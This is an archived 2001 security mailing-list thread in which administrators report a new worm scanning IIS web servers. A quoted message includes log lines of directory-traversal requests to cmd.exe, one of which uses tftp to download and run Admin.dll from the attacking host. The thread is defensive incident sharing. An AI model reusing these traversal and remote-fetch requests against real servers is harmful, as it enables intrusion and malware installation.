-----Original Message-----
From: Luke Butcher [mailto:[EMAIL PROTECTED]]
Sent: Tuesday, September 18, 2001 1:06 PM
To: [EMAIL PROTECTED]
Subject: RE: something new afoot, sweeping scans:Seeing hits from this new worm, looks like it tries circa 30 URLs.
Logic looks similar to Code Red II/III, in that most hits are coming from similar class B and C networks.Not sure of payload though as we're protected.
Regards,
Luke Butcher
Em: [EMAIL PROTECTED]
> -----Original Message-----
> From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]]
> Sent: Tuesday, September 18, 2001 5:50 PM
> To: [EMAIL PROTECTED]; [EMAIL PROTECTED];
> [EMAIL PROTECTED]
> Cc: [EMAIL PROTECTED]
> Subject: Re: something new afoot, sweeping scans:
>
>
> I haven't been able to get a copy of the worm yet, but
> it scans IIS machines for vulnerabilities able to run
> cmd.exe?\dir+c, then if that works, sends an attempt
> to run tftp back to itself and grab "Admin.dll", then
> run it.
>
> Here are some logs:
>
> Tue Sep 18 09:43:13 2001: 38.214.180.8 -> x.x.1.29: 1888 ->
> 80 GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2460 ->
> 80 GET
> /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%2038.21
4.180.8%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0
> Tue Sep 18 09:43:20 2001: 38.214.180.8 -> x.x.1.29: 2500 ->
> 80 GET /scripts/..%252f../Admin.dll HTTP/1.0
E-mail Disclaimer
Nabarro Nathanson
Principal office:
Lacon House, Theobalds Road
London WC1X 8RW
Tel: +44 (0)20 7524 6000 Fax: +44(0)20 7524 6524
NOTICE
This message contains confidential (and potentially legally privileged) information solely for its intended recipients and others may not distribute, copy or use it. If you have received this communication in error please tell us either by return e-mail or at the numbers above and delete it, and any copies of it.
The contents of this e-mail are subject to the firms Terms of Business copies of which are available on our website.
We have taken steps to ensure that this message (and any attachments or hyperlinks contained within it) are free from computer viruses and the like. However, in accordance with good computing practice the recipient is responsible for ensuring that it is actually virus free before opening it.
Regulated by the Law Society. A list of partners is available at the address above or on our website, http://www.nabarro.com
Title: RE: something new afoot, sweeping scans:
my Pix
is filtering out tons of SYN connections to port 80 from several subs domains on
209.x.x.x
This
part of it? I am assuming so.
.......................................................................................................
Dean M. Dorman
Systems
Administrator
Putnam Company / Acorn
Markets
PGP Key fingerprint:
6ABF BAF4 7784 1F54 18A6 C8A6 C788
4C14 22C2 5A75
........................................................................................................
- Re: something new afoot, sweeping scans: gilles
- Re: something new afoot, sweeping scans: Frank Neumann
- Re: something new afoot, sweeping scans: Patrick Benson
- Re: something new afoot, sweeping scans: Josh Welch
- Re: something new afoot, sweeping scans: Bgs himself
- Re: something new afoot, sweeping scans: Jim Hutchins
- RE: something new afoot, sweeping scans: Luke Butcher
- RE: something new afoot, sweeping scans: Jose Nazario
- Re: something new afoot, sweeping scans: Stu
- RE: something new afoot, sweeping scans: C. Russell Goulding
- RE: something new afoot, sweeping scans: Dean Michael Dorman
- RE: something new afoot, sweeping scans: Derek Johnson
- RE: something new afoot, sweeping scans: lherbst
- RE: something new afoot, sweeping scans: Paul Wentland
- RE: something new afoot, sweeping scans: Johnston Mark
